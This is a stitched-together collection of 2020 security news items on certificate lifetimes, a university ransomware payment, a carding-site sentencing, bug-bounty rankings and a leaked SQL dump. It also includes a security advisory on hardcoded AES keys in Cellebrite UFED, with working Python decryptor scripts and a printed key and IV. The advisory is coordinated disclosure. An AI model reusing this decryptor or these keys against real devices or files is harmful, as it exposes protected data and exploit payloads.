From September 1, Apple software, from Safari to macOS to iOS, will reject new HTTPS and other SSL/TLS certificates that are valid for more than 398 days, plus or minus some caveats.

If that sounds familiar, it’s because we told you so in February before the iGiant even formally announced the policy. A month later, it revealed the rules with a few exceptions. For example, this policy applies to certificates issued ultimately from root CAs known to Apple’s operating systems, not user or administrator-added CAs.

“Connections to TLS servers violating these new requirements will fail,” Apple warned in its official note. “This might cause network and app failures and prevent websites from loading.”

What this means for netizens is that websites and apps may stop working as expected on Apple gear some time after September 1, if said sites and apps renew or use new encryption certificates that last longer than 398 days. For developers and site admins, that means if you’re creating or renewing certs after September 1, make sure they expire within that time limit, or they won’t work as you expect in Safari, on iOS, and with other Apple software. Users may see error messages or notice connections fail and services break.

Apple Safari icon

Apple drops a bomb on long-life HTTPS certificates: Safari to snub new security certs valid for more than 13 months

READ MORE

Apple reckons this policy ensures websites and apps refresh their certs once a year, thus encouraging them to use the latest cryptographic standards, and ensures stolen certs cannot be used for long-running phishing campaigns and other shenanigans as they’ll expire soon enough.

Critics, particularly commercial certificate sellers, say it burdens software makers and site owners with extra costs and hassle, and will drive folks to free services, such as Let’s Encrypt – which, incidentally, offers tools to regularly and automatically renew certificates at no cost.

In any case, Google’s Chrome is set to follow suit, judging by this commit to the Chromium browser engine source code last week:

And Mozilla is preparing to adopt the policy in its Firefox browser. Moz program manager Kathleen Wilson said in March she would have preferred broad industry consensus in favor of the policy before committing to it, though noted: “However, the ball is already rolling.”

Mozilla and other tech giants previously lobbied the CA/Browser Forum – a collective of certificate issuers and browser makers – for shorter cert lifetimes. After those proposals were shot down in a vote, Apple went ahead anyway with a one-year-max policy and bypassed the industry forum, a move backed by the Chromium team. Spokespeople for Mozilla and Google were not available for further comment.

Now all eyes are on Microsoft, which is expected to make a decision on the issue by the Fall.

Suffice to say, certificate sellers were irritated by the change. “The unilateral decision of Apple, against the results of the ballot, makes the CA/B Forum a little bit useless, from our point of view,” sniffed Spanish cert biz Firmaprofesional.

Telia added: “We can manage with the changes but we think that it is an unnecessary burden to our community and we should give more time to them to build their SSL automation, perhaps two more years.” ®

Sponsored: Ransomware has gone nuclear

Follow me for more information.

As one of at least three universities hit in June, the school paid $1.14 million to cybercriminals following an attack on “several IT systems” in the UCSF School of Medicine.

The University of California San Francisco paid about $1.14 million to ransomware operators earlier this month after its malware compromised several important servers in the UCSF School of Medicine and encrypted them to prevent access, UCSF administrators stated on June 26.

The crypto-ransomware attacks, which have been attributed to the NetWalker group, also reportedly hit Michigan State University and Columbia College of Chicago. UCSF, which has pursued a substantial amount of research on coronavirus and COVID-19, stated that the attacks had not affected that research, nor had an impact on the operations of its medical center and patient care.

However, the ransomware had affected “a limited number of servers” in the medical school, the university said in a statement.

“The data that was encrypted is important to some of the academic work we pursue as a university serving the public good,” the statement said. “We therefore made the difficult decision to pay some portion of the ransom, approximately $1.14 million, to the individuals behind the malware attack in exchange for a tool to unlock the encrypted data and the return of the data they obtained.”

UCSF’s information technology department caught the attack in progress and “quarantined several IT systems within the School of Medicine as a safety measure,” preventing the attack from reaching the “core UCSF network,” the university said in the June 26 statement.

The attack and its million-dollar consequences show that organizations must be able to recognize attacks and stop them much quicker, says Marcus Fowler, director of strategic threat at Darktrace, a threat protection firm.

“I think with ransomware, speed and visibility is going to be the key,” he says. “They are running around and unplugging machines to manage the bleeding, rather than focusing on what happened.”

NetWalker started attacking organization in 2019, focusing on large, global entities, according to cybersecurity firm SentinelOne. The group uses many generic system tools and tends to focus on so-called “living off the land” tactics, where the attackers try to only use utilities already present on the system to avoid being detected when installing malware, Jim Walter, a senior threat researcher at SentinelOne, wrote in a blog post on the group.

In February, the group attacked the Toll Group, an Australian shipping and logistics firm, causing disruptions to the company’s operations and customers, according to media reports. In March 2020, the NetWalker group infected multiple hospitals in Spain, luring victims into opening malicious PDF documents that promised updated information on COVID-19. The latter incident, along with the attack on UCSF, highlights that cybercriminal groups — which had pledged to refrain from attacking hospitals and medical-research facilities during the coronavirus pandemic — cannot be trusted to forgo profits.

NetWalker, in particular, appears to be attacking with abandon — and leaking data, if the organization does not pay, Walter says.

“Consequently, detection and clean-up is no longer sufficient to ensure organizational data remains confidential and secure,” he wrote in the blog post. “Prevention is the only the cure for threats like NetWalker, which hit organizations with the double-edged sword of encryption by ransomware and extortion via threats of public data exposure.”

BBC News managed to get a fly-on-the-wall view of the negotiation between UCSF and the NetWalker criminal group — a negotiation that started at $3 million. After some back and forth, the two parties negotiated to 116.4 Bitcoins, or $1.14 million, which the school paid.

The school notified the FBI and are cooperating with their investigation. The university does not believe that any sensitive medical information had been exposed by the attack.

“Our investigation is ongoing but, at this time, we believe that the malware encrypted our servers opportunistically, with no particular area being targeted,” USCF stated in its statement. “The attackers obtained some data as proof of their action, to use in their demand for a ransom payment.”

The school declined to offer additional details, citing the ongoing federal investigation.

“In order to preserve the integrity of the investigation, we are limited in what we can share at this time and appreciate everyone’s patience as we resolve this situation,” UCSF said in its June 17 statement.

Related Content:

Learn from industry experts in a setting that is conducive to interaction and conversation about how to prepare for that “really bad day” in cybersecurity. Click for more information and to register for this On-Demand event. 

 

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

Aleksei Burkov will go to federal prison for operating two websites built to facilitate payment card fraud, hacking, and other crimes.

Russian national Alexei Yurievich Burkov has been sentenced to nine years in federal prison for his operation of two websites, CardPlanet and Direct Connection, dedicated to payment card fraud, computer hacking, and other crimes, the Department of Justice said late last week.

CardPlanet was a so-called “carding” website built to sell credit and debit card numbers stolen through computer hacking. Many of the card numbers sold belonged to US citizens, and more than 150,000 stolen payment card numbers were sold on CardPlanet, resulting in at least $20 million in fraudulent purchases made with US payment card accounts.

The price of stolen payment cards ranged from $2.50 to $60 on CardPlanet depending on the card type, country of origin, and availability of cardholder data like name and address. To encourage purchases, Burkov offered a fee-based “checker” service that enabled customers to verify stolen payment card numbers. If a card was invalid, Burkov promised to replace it. He advertised his shop as the only one that would refund the price of invalid payment card data. 

Some customers who bought stolen data from CardPlanet encoded the numbers on counterfeit payment cards embossed with the card company’s logo, without the company’s knowledge or consent, the indictment states. These counterfeit cards were used to buy goods and services across the United States, both in-person and online.

In addition to CardPlanet, the indictment alleges Burkov and his co-conspirators ran an online forum where elite cybercriminals could meet in a secure place to plan crimes, help one another commit crimes and avoid law enforcement, and buy and sell stolen goods and services: payment card numbers, personally identifiable information, botnets, and other malware. While the indictment does not specify the forum’s name, some reports call it Direct Connection.

The forum was divided into several subsections so members could comment on different topics including news, online shopping, buying and selling payment card data, carding documents and equipment, bank account cashouts and bank transfers, and information security topics like databases, botnets, Trojans, scripts, and exploits. Burkov was active on the forum several times per week and used it to drive traffic back to CardPlanet and further his illicit operations there.

Burkov also used this forum to advertise his illegal services and find others selling illicit goods and services he wanted to buy, officials explain in the indictment. He and his co-conspirators controlled access to the forum so as to avoid infiltration. Applicants were required to have three members vouch for them to verify their reputation for, and history of, cybercrime. They had to put up a sum of money – usually around $5,000 – as insurance in case they failed to pay for services on the forum, and all members of the forum had to vote on their acceptance.

“These measures were designed to keep law enforcement from accessing Burkov’s cybercrime forum and to ensure that members of the forum honored any deals made while conducting business on the forum,” officials explain in a statement.

Burkov was arrested at the Ben-Gurion Airport near Tel Aviv, Israel in December 2015; an Israeli district court approved his extradition in 2017. He was extradited to the US in November 2019. In January 2020 he pleaded guilty to one count of access device fraud and one count of conspiracy to commit access device fraud, identity theft, computer intrusions, wire fraud, and money laundering.

A Long Road to Sentencing

It’s rare to see a Russian cybercriminal extradited and sentenced. This sentencing did not arrive without pushback from Moscow, which fought for four years to keep Burkov from being extradited to the United States. As KrebsOnSecurity notes, Israel turned down requests to send the cybercriminal back to Russia, where he allegedly faced other hacking charges. When that didn’t work as planned, Russia imprisoned an Israeli woman in an attempt to trade prisoners.

The FBI and Homeland Security Investigation (HSI) unit, US authorities for bringing cybercrime to justice, are often challenged to bring cybercriminals to the US for prosecution despite help from Interpol and other agencies. Even if the US has an extradition treaty in place with a country, the government can choose not to extradite individuals on a case-by-case basis.

More than 76 countries do not have an extradition treaty with the US, meaning even known criminals have a low chance of being brought to justice. This is the case with Russia and China, whose citizens are not extradited to the United States. Because of this, US authorities typically monitor the criminals’ activity and try to learn when they plan to travel to another country.

Burkov isn’t the first Russian cybercriminal to be extradited to the United States. Peter Yuryevich Levasho, operator of the Kelihos botnet, was arrested in Barcelona in April 2017 and extradited to the US, where he pleaded guilty in federal court to charges related to criminal activities. Russian national Yevgeniy Nikulin, accused of breaking into Dropbox and the 2012 cyberattack on LinkedIn, was extradited to the US after being detained in the Czech Republic.

Related Content:

Learn from industry experts in a setting that is conducive to interaction and conversation about how to prepare for that “really bad day” in cybersecurity. Click for more information and to register for this On-Demand event. 

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

Rankings based on total bounties paid, top single bounty paid, time to respond, and more.

HackerOne, a platform on which companies offer bug bounties, has released its annual list of the biggest and most lucrative programs being offered. For the second consecutive year, Verizon Media has the No. 1 program, with more than $9.4 million in bounties paid as of April.

The No. 10 program on the list belongs to Airbnb, which paid a total of $944,000 and a top bounty of $15,000. Between the two were the bug-bounty programs of companies like PayPal, Uber, GitLab, and Mail.ru, which paid total bounties ranging from $3 million to $987,000.

In addition to total bounties paid, the rankings were based on factors including top single bounty paid, time to respond, time to bounty payout, and the number of hackers involved in the program. The top bounty paid was $70,000, by Verizon Media. GitLab had the fastest average response time — one hour — while Twitter had the shortest average time between bug report and bounty payment, at just eight days.

Read more here.

Learn from industry experts in a setting that is conducive to interaction and conversation about how to prepare for that “really bad day” in cybersecurity. Click for more information and to register for this On-Demand event. 

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

fulldisclosure logo Full Disclosure mailing list archives

KL-001-2020-003 : Cellebrite EPR Decryption Relies on Hardcoded AES Key Material


From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure () seclists org>
Date: Mon, 29 Jun 2020 15:46:42 -0500


KL-001-2020-003 : Cellebrite EPR Decryption Relies on Hardcoded AES Key Material Title: Cellebrite EPR Decryption Relies on Hardcoded AES Key Material
Advisory ID: KL-001-2020-003
Publication Date: 2020.06.29
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-003.txt 1. Vulnerability Details Affected Vendor: Cellebrite Affected Product: UFED Affected Version: 5.0 - 7.5.0.845 Platform: Embedded Windows CWE Classification: CWE-321: Hardcoded Use of Cryptography Keys CVE ID: CVE-2020-14474 2. Vulnerability Description The Cellebrite UFED Physical device relies on key material hardcoded within both the executable code supporting the decryption process and within the encrypted files themselves by using a key enveloping technique. The recovered key material is the same for every device running the same version of the software and does not appear to be changed with each new build. It is possible to reconstruct the decryption process using the hardcoded key material and obtain easy access to otherwise protected data. 3. Technical Description A recursive listing of my standalone decryptor directory: $ find . . ./decrypt-epr ./input ./input/DLLs ./input/DLLs/731 ./input/DLLs/731/FileUnpacking.dll ./input/EPRs ./input/EPRs/731 ./input/EPRs/731/Android.zip.epr ./output ./output/EPRs ./output/EPRs/731 ./extract-keys ./Makefile (See the Proof of Concept section for relevant code snippets.) First, we start by running the extract-keys script on the relevant FileUnpacking.dll file. The provided Makefile will automatically output the relevant key material to the same directory where the DLL resides. $ make keys Extracting AES keys from input/DLLs/731/FileUnpacking.dll 64+0 records in 64+0 records out 64 bytes copied, 0.000186032 s, 344 kB/s 32+0 records in 32+0 records out 32 bytes copied, 0.000116104 s, 276 kB/s 636+0 records in 636+0 records out 636 bytes copied, 0.00140342 s, 453 kB/s Finished The extract-keys script contains a nested JSON-object and iterates over the bytes of the file provided creating a SHA256 hash for each DWORD. The calculated hash is compared against known matches and when found the script will automatically extract the bytes relevant. Now a selected EPR file may be decrypted. A good example is the Android.zip.epr file, which contains a set of local privilege escalation exploits. $ ./decrypt-epr --verbose --file input/EPRs/731/Android.zip.epr [+] The EPR file specified exists. [+] The specified EPR file has been read into memory. [-] Decrypter setup with key 1 for version 3 [+] Round one of the EPR decryption completed successfully. [-] Calculated that the flag will be: [REDACTED] [+] The SHA256 key flag has been calculated. [-] Found the flag: [REDACTED] [+] The SHA256 key flag has been found. [-] Decrypter setup with key 2 for version 3 [+] Round two of the EPR decryption completed successfully. Obtained the final AES key and IV. [-] AES Key: [REDACTED], IV: [REDACTED] [-] Decrypter setup with key 3 for version 3 [-] Finished decrypting all blocks. [-] Writing bytes to: input/EPRs/731/Android.zip.epr.broken [-] Wrote 2552640 bytes to a broken file. [+] Round three of the EPR decryption completed successfully. The encrypted zip archive has been decrypted. [-] Running: zip -FF input/EPRs/731/Android.zip.epr.broken --out input/EPRs/731/Android.zip.epr.zip > /dev/null 2>&1 [-] Removing the broken file. [+] Decrypted file available at output/EPRs/731/Android.zip.epr.zip [+] done. The decrypted file can then be unzipped. $ unzip Android.zip.epr.zip Archive: Android.zip.epr.zip inflating: c2a_disable_selinux_32.ko inflating: c2a_disable_selinux_64.ko inflating: com.mr.meeseeks.apk inflating: daemonize inflating: dirtycow inflating: dirtycow_32 inflating: DisableHuaweiLogging_2.1.5767a inflating: django_2.1.5767a inflating: EnableHuaweiLogging_2.1.5767a inflating: EnableSharpRead_2.1.5767a inflating: exploits_2.1.5769.csv inflating: forensics inflating: fourrunnerStatic_2.1.5767a inflating: gb_2.1.5767a inflating: nandd inflating: nandread-pie-vold inflating: nandread-pie_7182 inflating: nandread64-pie-vold inflating: nandreadStatic_7182 inflating: patcher.exe inflating: pingroot inflating: pingroot_vultest inflating: psneuter_2.1.5767a inflating: RecoveryImageMap.csv inflating: rootspotter.apk inflating: rootspot_verify_env inflating: rosecure_2.1.5767a inflating: setuid_2.1.5767a inflating: shellcode.bin inflating: shellcode_32_iptables.bin inflating: shellcode_32_oatdump.bin inflating: zergRush_2.1.5767a The encryption algorithm uses a software-only key enveloping technique where part of the key material is stored within executable code and part within a encrypted header inside of the encrypted file. The encrypted header is extracted from the encrypted file and decrypted using key material hardcoded within executable code. Some of the bytes decrypted then undergo a XOR operation to calculate the last DWORD of a SHA256 hash. Separately, a set of 254 bytes is iterated over using 64 bytes per iteration. A complete SHA256 hash is generated for each set of 64-bytes and the ending DWORD of this hash is then compared against the calculated DWORD. If there is a match the bytes used to calculate the DWORD are the next set of key material. The decryption tool outputs the following match: [-] Calculated that the flag will be: [REDACTED] [+] The SHA256 key flag has been calculated. [-] Found the flag: [REDACTED] The last DWORD matches. In fact there are a total of eight possible intermediate keys that can be chosen from based on the bytes observed. A third and final key exists within each encrypted file header. This key is decrypted using the hardcoded intermediate key used for encrypted the selected file. From here bytes 0x80 through the end of the file are decrypted in blocks of 0x10000. 4. Mitigation and Remediation Recommendation The vendor has informed KoreLogic that this vulnerability is not present on recent versions of the UFED devices. Cellebrite stated, "While the method described in the reports does not work on recent versions (we previously made multiple changes that broke it), the core key material was exposed and will be rotated effective immediately." 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2020.04.02 - KoreLogic submits vulnerability details to Cellebrite. 2020.04.02 - Cellebrite acknowledges receipt and the intention to investigate. 2020.05.13 - KoreLogic requests an update on the status of the vulnerability report. 2020.05.14 - Cellebrite responds, notifying KoreLogic that the technique is not applicable to newer UFED releases. Requests time beyond the standard 45 business day embargo to ensure all exposed keys have been changed. 2020.06.09 - 45 business days have elapsed since the report was submitted to Cellebrite. 2020.06.12 - KoreLogic requests an update from Cellebrite. 2020.06.14 - Cellebrite reports that affected key material has been retired. 2020.06.18 - CVE Requested. 2020.06.19 - MITRE issues CVE-2020-14474. 2020.06.29 - KoreLogic public disclosure. 7. Proof of Concept File Name: Makefile clean: for filepath in `find input/DLLs -type f -name '*.keys' -o -name '*.aes' -o -name '*.iv' -o -name '*.map' -o
-name '*.zip'`; do \ rm -rf $$filepath ; \ done keys: @for filepath in `find input/DLLs -type f -name '*.dll'` ; do \ echo Extracting AES keys from $$filepath ; \ ./extract-keys --file $$filepath > $$filepath.keys ; \ if [ -f "$$filepath" ] ; then \ dd bs=1 if=$$filepath.keys count=64 of=$$filepath.aes ; \ dd bs=1 if=$$filepath.keys count=32 skip=64 of=$$filepath.iv ; \ dd bs=1 if=$$filepath.keys skip=96 of=$$filepath.map ; \ else \ echo Could not find extract-keys output ; \ fi \ done ; \ echo Finished Script Name: extract-keys #!/usr/bin/python from optparse import OptionParser from os.path import exists, basename from binascii import hexlify from hashlib import sha256 from os import makedirs keyMap = { # UFED 5.1 "Dump_MotGSM.dll":{ "offsets":{ "aes":{ "key":"0e282e124bb8af53357f7e8cb3460a23c94def3fe4f181a57c9fcba3f5f7f054", # Key and IV already
public information "iv":"888c609edc9eb9dfb4d30dfebc9f0431" #
https://github.com/cellebrited/cellebrite } } }, # UFED 7.3 "FileUnpacking.dll":[ { "offsets":{ "aes":{ "keySize":32, "keyHash":"[REDACTED]", # sha256 hash of first dword "ivSize":16, "ivHash":"[REDACTED]" # sha256 hash of first dword }, "mapSize":256, "mapHash":"[REDACTED]" # sha256 hash of first dword } } ] } if __name__ == "__main__": parser = OptionParser() parser.add_option("--file",dest="file",default='',help="Decryptor DLL") o,a = parser.parse_args() if (exists(o.file) != True): print "[!] The specified file does not exist" exit(1) try: with open(o.file,'rb') as fp: fileData = fp.read() print "[-] Read {} bytes.".format(len(fileData)) if (isinstance(keyMap[basename(o.file)], str)): if ("Dump_MotGSM.dll" == basename(o.file)): print keyMap[basename(o.file)]["offsets"]["aes"]["key"] + keyMap[basename(o.file)]["offsets"]["aes"]["iv"] else: foundKey, foundIV, foundMap = False, False, False for i in xrange(0, len(keyMap[basename(o.file)])): for pos in xrange(0,len(fileData)): nextDWORD = hexlify(fileData[pos:pos+4]) if (sha256(nextDWORD).hexdigest() == keyMap[basename(o.file)][i]["offsets"]["aes"]["keyHash"] and not
foundKey): foundKey = True aesKey = hexlify(fileData[pos:pos+32]) print "[+] Found key at {}. Value: {}".format(hex(pos),aesKey) if (sha256(nextDWORD).hexdigest() == keyMap[basename(o.file)][i]["offsets"]["aes"]["ivHash"] and not
foundIV): foundIV = True aesIV = hexlify(fileData[pos:pos+16]) print "[+] Found IV at {}. Value: {}".format(hex(pos),aesIV) if (sha256(nextDWORD).hexdigest() == keyMap[basename(o.file)][i]["offsets"]["mapHash"] and not foundMap): foundMap = True aesMap = hexlify(fileData[pos:pos+keyMap[basename(o.file)][i]["offsets"]["mapSize"]]) print "[+] Found map at {}. Value: {}".format(hex(pos),aesMap) if (foundKey and foundIV and foundMap): break pos+=1 except Exception as e: print "[!] Could not read the specified file. Reason: {}".format(e) exit(0) Script Name: decrypt-epr #!/usr/bin/python from logging.handlers import TimedRotatingFileHandler from optparse import OptionParser from os.path import exists, getsize, dirname, realpath from os.path import join as path_join from os import system, remove from shutil import move from Crypto.Cipher import AES from binascii import unhexlify, hexlify from hashlib import sha256 import sys import logging logging.basicConfig( format="%(asctime)s [%(levelname)s] %(message)s", level=logging.INFO, handlers=[ TimedRotatingFileHandler( path_join( dirname(realpath(__file__)), "logger.log", ), interval=1, ), logging.StreamHandler(sys.stdout), ], ) logger = logging.getLogger(__name__) bs = AES.block_size pad = lambda s: s + (bs - len(s) % bs) * chr(bs - len(s) % bs) class EPR: def __init__(self, file, version, verbose): self.epr_v1_aes_key = "0e282e124bb8af53357f7e8cb3460a23c94def3fe4f181a57c9fcba3f5f7f054" # Already public
information self.epr_v1_aes_iv = "888c609edc9eb9dfb4d30dfebc9f0431" # Already public
information self.epr_v2_aes_key = "[REDACTED]" self.epr_v2_aes_iv = "[REDACTED]" self.epr_v3_aes_key = self.epr_v2_aes_key self.epr_v3_aes_iv = self.epr_v2_aes_iv self.epr_v2_aes_map = "[REDACTED]" self.epr_v3_aes_map = "[REDACTED]" self.epr_v3_aes_iv_two = None self.file = file or False self.version = version self.encrypted_file = None self.encrypted_epr = None self.encrypted_magic = None self.decrypted_epr = None self.final_epr = b'' self.logging = verbose def file_exists(self): if not self.file: return False return exists(self.file) def can_read_file(self): return getsize(self.file) def read_entire_file(self): try: fp = open(self.file,'rb') self.encrypted_file = fp.read() fp.close() except Exception as e: logger.error("[!] Encountered an exception. Reason: {}".format(e)) return False return True def flat_decrypt(self): self.encrypted_magic = self.encrypted_file[:21] if (self.encrypted_magic[:-2] == "Cellebrite EPR File"): self.encrypted_epr = self.encrypted_file[21:] if self.version == 1: crypter = AES.new(unhexlify(self.epr_v1_aes_key),AES.MODE_CBC,unhexlify(self.epr_v1_aes_iv)) if self.logging: logger.info("[-] Decrypter setup with key 1 for version {}".format(self.version)) else: crypter = AES.new(unhexlify(self.epr_v3_aes_key),AES.MODE_CBC,unhexlify(self.epr_v3_aes_iv)) if self.logging: logger.info("[-] Decrypter setup with key 1 for version {}".format(self.version)) try: self.decrypted_epr = crypter.decrypt(self.encrypted_epr) if self.version == 2: self.epr_v2_aes_iv_two = hexlify(self.decrypted_epr[32:48]) elif self.version == 3: self.epr_v3_aes_iv_two = hexlify(self.decrypted_epr[32:48]) else: pass except Exception as e: logger.error("[!] Encountered an exception. Reason: {}".format(e)) return False return True return False def calc_sha256_dword(self): try: to_xor_a = hexlify(self.decrypted_epr[24:28]) to_xor_a = [to_xor_a[i:i+2] for i in range(0, len(to_xor_a), 2)] to_xor_b = hexlify(self.decrypted_epr[28:32]) to_xor_b = [to_xor_b[i:i+2] for i in range(0, len(to_xor_b), 2)] xored_1 = int(to_xor_a[-1],16) ^ int(to_xor_b[-1],16) xored_1 = "{0:0{1}x}".format(xored_1,2) xored_2 = int(to_xor_a[-2],16) ^ int(to_xor_b[-2],16) xored_2 = "{0:0{1}x}".format(xored_2,2) xored_3 = int(to_xor_a[-3],16) ^ int(to_xor_b[-3],16) xored_3 = "{0:0{1}x}".format(xored_3,2) xored_4 = int(to_xor_a[-4],16) ^ int(to_xor_b[-4],16) xored_4 = "{0:0{1}x}".format(xored_4,2) if (self.version == 2): self.epr_v2_sha256_flag = str(xored_4) + str(xored_3) + str(xored_2) + str(xored_1) if self.logging: logger.info("[-] Calculated that the flag will be: {}".format(self.epr_v2_sha256_flag)) else: self.epr_v3_sha256_flag = str(xored_4) + str(xored_3) + str(xored_2) + str(xored_1) if self.logging: logger.info("[-] Calculated that the flag will be: {}".format(self.epr_v3_sha256_flag)) except Exception as e: logger.error("[!] Encountered an exception. Reason: {}".format(e)) return False return True def key_map_check(self): found = False if (self.version == 2): for i in range(0, len(self.epr_v2_aes_map), 64): hash = sha256(unhexlify(self.epr_v2_aes_map[i:i+64])).hexdigest() if (hash.endswith(self.epr_v2_sha256_flag)): if self.logging: logger.info("[-] Found the flag: {}".format(self.epr_v2_sha256_flag)) found = True self.epr_v2_aes_key_two = self.epr_v2_aes_map[i:i+64] else: for i in range(0, len(self.epr_v3_aes_map), 64): hash = sha256(unhexlify(self.epr_v3_aes_map[i:i+64])).hexdigest() if (hash.endswith(self.epr_v3_sha256_flag)): if self.logging: logger.info("[-] Found the flag: {}".format(self.epr_v3_sha256_flag)) found = True self.epr_v3_aes_key_two = self.epr_v3_aes_map[i:i+64] return found def decrypt_key(self): try: if (self.version == 2): crypter = AES.new(unhexlify(self.epr_v2_aes_key_two),AES.MODE_CBC,unhexlify(self.epr_v2_aes_iv_two)) if self.logging: logger.info("[-] Decrypter setup with key 2 for version {}".format(self.version)) self.epr_v2_aes_key_three = hexlify(crypter.decrypt(self.decrypted_epr[48:80])) self.epr_v2_aes_iv_three = hexlify(self.decrypted_epr[112:128]) else: crypter = AES.new(unhexlify(self.epr_v3_aes_key_two),AES.MODE_CBC,unhexlify(self.epr_v3_aes_iv_two)) if self.logging: logger.info("[-] Decrypter setup with key 2 for version {}".format(self.version)) self.epr_v3_aes_key_three = hexlify(crypter.decrypt(self.decrypted_epr[48:80])) self.epr_v3_aes_iv_three = hexlify(self.decrypted_epr[112:128]) except Exception as e: logger.error("[!] Encountered an exception. Reason: {}".format(e)) return False return True def decrypt_epr(self): if (self.version == 2): crypter = AES.new(unhexlify(self.epr_v2_aes_key_three),AES.MODE_CBC,unhexlify(self.epr_v2_aes_iv_three)) if self.logging: logger.info("[-] AES Key: {}, IV:
{}".format(self.epr_v2_aes_key_three,self.epr_v2_aes_iv_three)) else: crypter = AES.new(unhexlify(self.epr_v3_aes_key_three),AES.MODE_CBC,unhexlify(self.epr_v3_aes_iv_three)) if self.logging: logger.info("[-] AES Key: {}, IV:
{}".format(self.epr_v3_aes_key_three,self.epr_v3_aes_iv_three)) if self.logging: logger.info("[-] Decrypter setup with key 3 for version {}".format(self.version)) self.encrypted_epr = self.encrypted_epr[128:] for pos in range(0, len(self.encrypted_epr), 65536): decryptPart = self.encrypted_epr[pos:pos+65536] try: self.final_epr+=crypter.decrypt(decryptPart) except ValueError as e: self.final_epr+=crypter.decrypt(pad(decryptPart)) if self.logging: logger.info("[-] Finished decrypting all blocks.") try: if self.logging: logger.info("[-] Writing bytes to: {}.broken".format(self.file)) fp = open("{}.broken".format(self.file),"wb") fp.write(self.final_epr) fp.close() if self.logging: logger.info("[-] Wrote {} bytes to a broken file.".format(len(self.final_epr))) except Exception as e: logger.error("[!] Encountered an exception. Reason: {}".format(e)) return False return True def zip_FF(self): if self.logging: logger.info("[-] Running: zip -FF {}.broken --out {}.zip > /dev/null
2>&1".format(self.file,self.file)) system("zip -FF {}.broken --out {}.zip > /dev/null 2>&1".format(self.file,self.file)) return True def finish(self): if self.logging: logger.info("[-] Removing the broken file.") remove("{}.broken".format(self.file)) move("{}.zip".format(self.file),"{}.zip".format(self.file.replace("input","output"))) logger.info("[+] Decrypted file available at {}.zip".format(self.file.replace("input","output"))) return True def main(): parser = OptionParser() parser.add_option("--file",dest="file",default=False,help="EPR File Path") parser.add_option("--version",dest="version",choices=(str(1),str(2),str(3)),default=str(3),help="EPR Version") parser.add_option("--verbose",dest="verbose",action="store_true",help="Enable verbose mode") o,a = parser.parse_args() o.version = int(o.version) epr = EPR(o.file,o.version,o.verbose) if not epr.file_exists(): logger.info("[!] Unable to find the encrypted EPR file specified.") return False logger.info("[+] The EPR file specified exists.") if not epr.can_read_file(): logger.info("[!] Unable to open a file object to the encrypted EPR file.") return False if not epr.read_entire_file(): logger.info("[!] Unable to read the encrypted EPR file.") return False logger.info("[+] The specified EPR file has been read into memory.") logger.info("[+] Using the version {} decryption process.".format(o.version)) if not epr.flat_decrypt(): logger.info("[!] Unable to run the initial decryption round.") return False logger.info("[+] Round one of the EPR decryption completed successfully.") if not epr.calc_sha256_dword(): logger.info("[!] Unable to calculate the SHA256 key flag.") return False if o.verbose: logger.info("[+] The SHA256 key flag has been calculated.") if not epr.key_map_check(): logger.info("[!] Unable to find a AES key match.") return False if o.verbose: logger.info("[+] The SHA256 key flag has been found.") if not epr.decrypt_key(): logger.info("[!] Could not decrypt the final AES key.") return False logger.info("[+] Round two of the EPR decryption completed successfully. Obtained the final AES key and IV.") if not epr.decrypt_epr(): logger.info("[!] Unable to decrypt the EPR file.") return False logger.info("[+] Round three of the EPR decryption completed successfully. The encrypted zip archive has been
decrypted.") if not epr.zip_FF(): logger.info("[!] Could not clean up garbage.") return False return True if __name__ == "__main__": success = main() if success: logger.info("[+] done") else: logger.info("[!] failed") exit(success) The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Attachment: signature.asc
Description: OpenPGP digital signature

 _______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

  By Date           By Thread  

Current thread:

  • KL-001-2020-003 : Cellebrite EPR Decryption Relies on Hardcoded AES Key Material KoreLogic Disclosures via Fulldisclosure (Jun 29)

Follow me for more information.

Researchers who found the archived SQL files estimate up to 14 million people could be affected.

A team of security researchers has discovered a collection of SQL databases for sale on the Dark Web. The archived files were stolen from 945 websites around the world, Lucy Security reports.

All of these websites were breached by different attackers, according to the researchers, who found two databases containing approximately 150 GB of unpacked SQL files. One of these databases was released on June 1, 2020 and the other on June 10. The information within them, now publicly available, includes usernames, full names, phone numbers, hashed and non-hashed passwords, IP addresses, email addresses, and physical addresses. Up to 14 million people may be affected. 

Affected websites include 14 governmental sites belonging to Ukraine, Israel, United Kingdom, Belarus, Russia, Lebanon, Rwanda, Pakistan, and Kyrgyzstan. The SQL files taken from these websites are dated between 2017 and 2020. 

These findings are alarming on their own; however, researchers warn “this might be only the beginning.” The actor who shared this data on the Dark Web claims to have collected it without doing any of the hacking and promises to have more databases to share or sell.

Read more details here.

Learn from industry experts in a setting that is conducive to interaction and conversation about how to prepare for that “really bad day” in cybersecurity. Click for more information and to register for this On-Demand event. 

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

